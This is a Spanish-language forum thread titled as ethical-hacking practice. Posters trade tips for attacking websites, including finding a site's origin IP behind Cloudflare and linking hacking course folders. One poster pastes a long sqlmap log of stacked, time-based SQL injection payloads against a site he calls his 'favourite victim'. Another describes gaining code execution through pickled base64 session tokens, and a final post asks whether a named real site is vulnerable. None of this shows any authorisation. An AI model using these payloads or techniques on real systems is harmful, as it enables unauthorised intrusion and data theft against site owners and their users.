Cargando...




Servicios:FileShareChat


Vampiros activos recientemente:
Internet
  • Discusión Vampiresca
  • Temáticos
  • Fantasmas
  • Ovni
  • Tecnología
  • Paranormal
  • Historias de Terror
  • Estilos y Moda
  • Filosofía
  • Sueños
  • Arte/Cine/Musica
  • anime
  • Sugerencias
  • Galería
  • Galería de Vampiros
  • IRC
    #oscuridad@rizon.net
    Habilitar notificaciones
    en el título:

    Últimas en Galería

    Volver Hilo Completo Primeros 100 Anteriores 100 Siguientes 100 Últimos 50 Posts Reportar ▼ Bajar ▼ Estilo:  

    Página: 1-

    ¡Practiquemos Hacking Ético! (30 respuestas) thread icon

    1 [del]

    ¿Qué les gustaría hacer? Yo puedo enseñarles de todo.

    2 [del]

    Necesito billete bro. Crees que puedes ayudarme con eso?

    3 [del]

    No cosas ilegales por favor. Todo menos eso.

    4 [del]

    Ayuda a la chica de valle del cauca que decian que abusaban de ella. O al menos llegar al fondo de eso

    5 [del]

    >>1
    ¿Qué cuentas, oculto de internet? Yo tengo un problema de ser consistente con las cosas, no tiene nada que ver, pero tambien sé algo de hacking ético.
    ¿Qué tanto sabes de hacking?
    ¿Eres consistente con lo que haces?

    6 [del]

    >>5
    Sí, soy consciente. Actualmente es mi oficio así que es mi deber ser ético. Aunque si ustedes lo prefieren, puedo ser oscuro.

    Estoy en un nivel medio aún, aunque sé muchas cosas que te podrían interesar que ninguna IA te contará. Cuéntame que necesitas saber y yo puedo hacer el intento de hacer (siempre y cuando no implique dinero). OSINT.... Búsqueda de vulnerabilidades en sitios web.... Ingeniería socual....... Un montón de cosas.

    >>4
    ¿Qué pasó, y dónde?

    7 [del]

    >>6
    https://vampiros.org/read/internet/1746545699
    Detalles aqui

    8 [del]

    >>6
    ¿Conoces como puedo hallar vulnerabilidades a una web hecha con flask, nodejs y express? Tambien tiene cloudflare, y no he encontrado vulnerabilidades de las papas esas: xss, rce, etc
    O en general
    ¿Alguna guia para hallar vulnerabilidades a una web?

    9 [del]

    >>7
    Podría intentar ponerme en contacto con esa persona pero no tengo ni su correo personal ni nada para hacerlo. Desde ahora usaré el tripcode "h4x01r"  para que me reconozcan. Ahí escribí en el hilo en caso de que aparezca para ayudarlo en lo que sea necesario.

    >>8
    Puedes usar herramientas como zap, nuclei en kali, etc para buscar vulnerabilidades web. Si tiene cloudflare, usa shodan para obtener la IP real del sitio y bypassear el firewall de cloudflare.
    Te recomiendo estos tutoriales para aprender sobre ataques xss, inyección etc..

    Les dejo cursos interesantes donde comprenderán varios aspectos

    Curso de hacking web general, acá podrán encontrar varios tipos de ataques que se pueden aprender
    https://drive.google.com/drive/u/1/folders/1KPgjM1TOVmVJTWmkNvNddWYkkEzE9X6B

    Hacking a Redes WiFi
    https://drive.google.com/drive/u/0/folders/1AEDQgmOcOzKGvrzhcLxMQXD-Ns0WScxc

    10 [del]

    >>9
    Pero podrias investigar a las otras personas. Asi llegarias al fondo de todo esto

    11 [del]

    usemos nmap! qué podríamos escanear?

    12 [del]

    >>11
    Con Nmap no haremos nada útil si no hacemos un mapeo de los Endpoints, APIs, etc etc de la web a destino. Solo podremos hallar un puerto tipo 3000 y cer si el backend usa Express, flask o cualquier cosa. Yo a veces clono honeypots de la deep web con PHP para aprender y ver que vulnerabilidades me quieren explotar para hacer mis trampas cada vez más poderosas :D!

    13 [del]


    [23:01:38] [PAYLOAD] gal';(SELEct/**/*/**/FrOM/**/(SELEct(sleeP(5)))bfaQ)#
    [23:01:40] [PAYLOAD] gal');(sELECT/**/*/**/FROm/**/(sELECT(SlEeP(5)))bfaQ)#
    [23:01:41] [PAYLOAD] gal'));(sElECT/**/*/**/fROm/**/(sElECT(SlEeP(5)))bfaQ)#
    [23:01:43] [PAYLOAD] gal')));(SelEct/**/*/**/FRoM/**/(SelEct(sLEEP(5)))bfaQ)#
    [23:01:45] [PAYLOAD] gal%';(SelEcT/**/*/**/FRom/**/(SelEcT(sleeP(5)))bfaQ)#
    [23:01:46] [PAYLOAD] gal");(sELEct/**/*/**/fRoM/**/(sELEct(SleEp(5)))bfaQ)#
    [23:01:47] [PAYLOAD] gal"));(SeLECt/**/*/**/fROm/**/(SeLECt(SLeeP(5)))bfaQ)#
    [23:01:49] [PAYLOAD] gal";(sElect/**/*/**/FROm/**/(sElect(SLeEP(5)))bfaQ)#
    [23:01:50] [PAYLOAD] gal);(SELeCt/**/*/**/From/**/(SELeCt(sLeep(5)))bfaQ)#
    [23:01:52] [PAYLOAD] gal));(sElEcT/**/*/**/frOm/**/(sElEcT(sLeep(5)))bfaQ)#
    [23:01:54] [PAYLOAD] gal)));(seLECT/**/*/**/fRoM/**/(seLECT(SLeEP(5)))bfaQ)#
    [23:01:55] [PAYLOAD] gal;(SelEcT/**/*/**/FrOm/**/(SelEcT(SLeep(5)))bfaQ)#
    [23:01:58] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries (query SLEEP)' because the level (4) is higher than the provided (3)
    [23:01:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
    [23:01:58] [PAYLOAD] gal';seLEcT/**/BenChMArk(5000000,MD5(0x4b757666))#
    [23:02:00] [PAYLOAD] gal');SELect/**/bENcHMaRK(5000000,MD5(0x4b757666))#
    [23:02:02] [PAYLOAD] gal'));SelECT/**/BenchMark(5000000,MD5(0x4b757666))#
    [23:02:03] [PAYLOAD] gal')));SEleCT/**/BEnCHMarK(5000000,MD5(0x4b757666))#
    [23:02:05] [PAYLOAD] gal%';sELeCT/**/BeNchmArK(5000000,MD5(0x4b757666))#
    [23:02:06] [PAYLOAD] gal");SElECT/**/BenchMArk(5000000,MD5(0x4b757666))#
    [23:02:07] [PAYLOAD] gal"));SelEcT/**/BeNChmARk(5000000,MD5(0x4b757666))#
    [23:02:09] [PAYLOAD] gal";Select/**/beNChmaRk(5000000,MD5(0x4b757666))#
    [23:02:10] [PAYLOAD] gal);sEleCT/**/beNCHMArk(5000000,MD5(0x4b757666))#
    [23:02:11] [PAYLOAD] gal));sElECt/**/BEncHmArK(5000000,MD5(0x4b757666))#
    [23:02:13] [PAYLOAD] gal)));SELECt/**/bEnCHmarK(5000000,MD5(0x4b757666))#
    [23:02:15] [PAYLOAD] gal;SelECT/**/beNChMarK(5000000,MD5(0x4b757666))#
    [23:02:16] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (BENCHMARK)' because the level (5) is higher than the provided (3)
    [23:02:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [23:02:16] [PAYLOAD] gal';sELeCT/**/Pg_SlEEP(5)--
    [23:02:17] [PAYLOAD] gal');selecT/**/pg_SLEEp(5)--
    [23:02:21] [PAYLOAD] gal'));SeLECT/**/pg_SLeeP(5)--
    [23:02:22] [PAYLOAD] gal')));SELecT/**/pg_SLeeP(5)--
    [23:02:24] [PAYLOAD] gal%';sElecT/**/pG_sLEEP(5)--
    [23:02:26] [PAYLOAD] gal");SElect/**/Pg_SLeep(5)--
    [23:02:33] [PAYLOAD] gal"));SeLECt/**/pg_sLEEp(5)--
    [23:02:34] [PAYLOAD] gal";SELEcT/**/pg_sleEP(5)--
    [23:02:36] [PAYLOAD] gal);SeLEcT/**/pG_slEeP(5)--
    [23:02:37] [PAYLOAD] gal));selEcT/**/Pg_sLeEp(5)--
    [23:02:38] [PAYLOAD] gal)));SeleCt/**/pG_sLEEP(5)--
    [23:02:39] [PAYLOAD] gal;SElect/**/pG_SleEP(5)--
    [23:02:40] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the level (4) is higher than the provided (3)
    [23:02:40] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
    [23:02:40] [PAYLOAD] gal';selecT/**/CouNT(*)/**/FRoM/**/gENerate_SERIeS(1,5000000)--
    [23:02:42] [PAYLOAD] gal');SelECT/**/couNT(*)/**/fROm/**/GeNeRATE_SERiEs(1,5000000)--
    [23:02:44] [PAYLOAD] gal'));sElect/**/CouNT(*)/**/fROM/**/GENeRAte_SErIes(1,5000000)--
    [23:02:45] [PAYLOAD] gal')));SELeCt/**/coUNt(*)/**/frOM/**/GEneRaTE_SERiEs(1,5000000)--
    [23:02:46] [PAYLOAD] gal%';SELECt/**/cOUNT(*)/**/FrOM/**/GENerAte_seriES(1,5000000)--
    [23:02:48] [PAYLOAD] gal");sElEcT/**/counT(*)/**/FrOm/**/gENeRaTE_sERies(1,5000000)--
    [23:02:49] [PAYLOAD] gal"));seLecT/**/COunT(*)/**/FRom/**/gENErATE_SERies(1,5000000)--
    [23:02:55] [PAYLOAD] gal";SelecT/**/CounT(*)/**/frOM/**/genERAte_SeRies(1,5000000)--
    [23:02:56] [PAYLOAD] gal);SeLEcT/**/CounT(*)/**/froM/**/genERaTe_sERIes(1,5000000)--
    [23:02:57] [PAYLOAD] gal));sElECt/**/CoUNT(*)/**/fROm/**/gEneRATe_sERieS(1,5000000)--
    [23:03:00] [PAYLOAD] gal)));SeLeCt/**/Count(*)/**/FRom/**/GENERate_serIes(1,5000000)--
    [23:03:02] [PAYLOAD] gal;selecT/**/couNt(*)/**/FROm/**/gENERatE_seRiEs(1,5000000)--
    [23:03:03] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the level (5) is higher than the provided (3)
    [23:03:03] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
    [23:03:03] [PAYLOAD] gal';CREaTe/**/Or/**/RePlacE/**/functIon/**/SleeP(INt)/**/RETurns/**/INt/**/aS/**/'/lib/libc.so.6','sLEeP'/**/lANguAgE/**/'C'/**/STRICT;/**/SElecT/**/sLEeP(5)--                                                                                                                                                    
    [23:03:07] [PAYLOAD] gal');CrEatE/**/oR/**/RePlACe/**/fUNcTiOn/**/SLeEP(inT)/**/rETuRns/**/inT/**/As/**/'/lib/libc.so.6','SlEep'/**/lAnguAge/**/'C'/**/STRICT;/**/SELecT/**/SlEep(5)--                                                                                                                                                   
    [23:03:08] [PAYLOAD] gal'));CrEatE/**/Or/**/REPLace/**/fuNCTIon/**/sLEEp(iNT)/**/rEtuRNs/**/iNT/**/As/**/'/lib/libc.so.6','sleeP'/**/LANgUagE/**/'C'/**/STRICT;/**/selecT/**/sleeP(5)--                                                                                                                                                  
    [23:03:09] [PAYLOAD] gal')));Create/**/oR/**/rePLACE/**/FuNCTIon/**/slEep(inT)/**/rEtuRNS/**/inT/**/aS/**/'/lib/libc.so.6','slEeP'/**/LANguAGE/**/'C'/**/STRICT;/**/SElECt/**/slEeP(5)--                                                                                                                                                 
    [23:03:10] [PAYLOAD] gal%';cReatE/**/oR/**/rEPlAcE/**/FUncTion/**/sLEep(INt)/**/reTuRNs/**/INt/**/aS/**/'/lib/libc.so.6','sLeEP'/**/laNgUage/**/'C'/**/STRICT;/**/SeLeCT/**/sLeEP(5)--                                                                                                                                                   
    [23:03:12] [PAYLOAD] gal");CreaTE/**/Or/**/rEPlace/**/fuNCtION/**/SLeEP(inT)/**/RETUrnS/**/inT/**/aS/**/'/lib/libc.so.6','SleEP'/**/lAnGuage/**/'C'/**/STRICT;/**/sELeCT/**/SleEP(5)--                                                                                                                                                   
    [23:03:13] [PAYLOAD] gal"));creatE/**/Or/**/rEPLacE/**/FuNCTIOn/**/sleEP(iNt)/**/reTuRNs/**/iNt/**/aS/**/'/lib/libc.so.6','slEEP'/**/lANgUaGe/**/'C'/**/STRICT;/**/SelECT/**/slEEP(5)--                                                                                                                                                  
    [23:03:15] [PAYLOAD] gal";creATE/**/oR/**/ReplAce/**/FUnCtiOn/**/sLeeP(InT)/**/ReturnS/**/InT/**/As/**/'/lib/libc.so.6','SleEP'/**/LanGUAGe/**/'C'/**/STRICT;/**/sElEcT/**/SleEP(5)--                                                                                                                                                    
    [23:03:16] [PAYLOAD] gal);creATe/**/oR/**/repLAce/**/fuNcTIon/**/Sleep(INt)/**/ReTURNs/**/INt/**/aS/**/'/lib/libc.so.6','slEeP'/**/lANGUAGe/**/'C'/**/STRICT;/**/seLect/**/slEeP(5)--


    Estoy haciendo un ataque de inyeción SQL para ver si encuentro alguna vulnerabilidad

    14 [del]

    >>13
    Estoy experimentando con mi víctima preferida

    15 [del]

    >>14
    Oh querido, primero tienes que bypassear y mapear la web, si tiene cloudflare o no, si usa tecnologias desactualizadas o no.
    Muy dificil hallar una sql ciega o no ciega hoy en dia porque casi todos usan php o lo que sea actualizados, y digamos el hardening es complejo, y cualquier dev con dos dedos de frente saber mitigar y sanitizar todo lo que el user coloque en los inputs para evitar xss o rce, y si usan tokens de sesion, validar que los genera la web para evitar un RCE
    curiosidad: una vez le hice un rce a una pagina scam en la deep web porque podias meter lo que sea con burp suite en los tokens de inicio de sesion, solo tenias que cifrar tu codigo con pickle en base64 y ya xdxdxd
    pd: si quieres hallar una vulnerabilidad en una web, tal vez lo mejor sea leer sobre ingenieria social para ver donde fallamos nosotros los bipedos

    16 [del]

    >>15
    esta web será vulnerable?
    https://omaera.org


    ▲ Subir ▲ / Nuevos Posts /

    Nombre: Email:
    31
    Volver Hilo Completo Últimos 50 Primeros 100